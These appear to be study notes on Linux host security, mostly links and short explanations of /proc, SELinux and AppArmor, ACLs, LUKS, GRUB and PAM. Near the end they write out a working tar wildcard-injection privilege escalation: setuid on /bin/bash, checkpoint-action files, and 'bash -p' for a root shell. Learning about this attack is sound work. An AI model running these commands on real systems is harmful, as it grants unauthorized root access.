Host Security

• https://www.open-scap.org/getting-started/

Live OS

• https://tails.boum.org/

Partitions

• https://www.landoflinux.com/linux_procfs_sysfs.html

Commands:

• df -ahT
• fdisk -l
• man proc

Modern Linux distributions include a /sys directory as a virtual filesystem (sysfs, comparable to /proc, which is a procfs), which stores and allows modification of the devices connected to the system, whereas many traditional UNIX and Unix-like operating systems use /sys as a symbolic link to the kernel source tree.

sysfs is a ram-based filesystem, it provides a means to export kernel data structures, their attributes, and the linkages between them to userspace.

Proc

• /proc/cpuinfo : CPU Information
• /proc/filesystems : File-system Information being used currently.
• /proc/interrupts : Information about the current interrupts being utilised currently.
• /proc/ioports : Contains all the Input/Output addresses used by devices on the server.
• /proc/meminfo : Memory Usages Information.
• /proc/modules : Currently using kernel module.
• /proc/mount : Mounted File-system Information.
• /proc/stat : Detailed Statistics of the current System.
• /proc/swaps : Swap File Information.

Mandatory Access Control (MAC)

Discretionary Access Control (DAC) - With DAC, files and processes have owners. You can have the user own a file, a group own a file, or other, which can be anyone else. Users have the ability to change permissions on their own files.

But on MAC systems like SELinux, there is administratively set policy around access. Even if the DAC settings on your home directory are changed, an SELinux policy in place to prevent another user or process from accessing the directory will keep the system safe. 

• SELinux = Redhat Based
• AppArmor = Ubuntu, Debian, Suse

SELINUX

• https://www.redhat.com/en/topics/linux/what-is-selinux
• https://github.com/SELinuxProject/selinux-notebook
• https://www.thegeekdiary.com/understanding-selinux-policies-in-linux/

AppArmor

• https://www.howtogeek.com/118222/htg-explains-what-apparmor-is-and-how-it-secures-your-ubuntu-system/ aa-status

ACL

• getfacl
• setfacl
  • setfacl -m g:students:rwx file

Encryption

• https://wiki.archlinux.org/title/Data-at-rest_encryption#Comparison_table

LUKS

• https://linuxconfig.org/basic-guide-to-encrypting-linux-partitions-with-luks

GRUB

• https://www.systranbox.com/what-is-grub-and-why-is-it-important/
• https://www.tecmint.com/password-protect-grub-in-linux/
• https://www.tecmint.com/reset-forgotten-root-password-in-debian/

PAM

• https://www.redhat.com/sysadmin/pluggable-authentication-modules-pam
• https://cyber.vumetric.com/vulns/linux-pam/linux-pam/
• https://www.tecmint.com/configure-pam-in-centos-ubuntu-linux/
• https://tldp.org/HOWTO/User-Authentication-HOWTO/x115.html
• https://www.techradar.com/how-to/how-to-add-two-factor-authentication-to-linux-with-google-authenticator

Wildcard Exploit

• https://www.davila.me/menu/vulnerability-methods/wildcard-injection
• https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb

echo "chmod +s /bin/bash" > exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"

# remove comment in root crontab
bash -p
whoami

Security Tools

• https://www.cvedetails.com/
• https://github.com/DominicBreuker/pspy
• https://pentestmonkey.net/tools/audit/unix-privesc-check
• https://github.com/rebootuser/LinEnum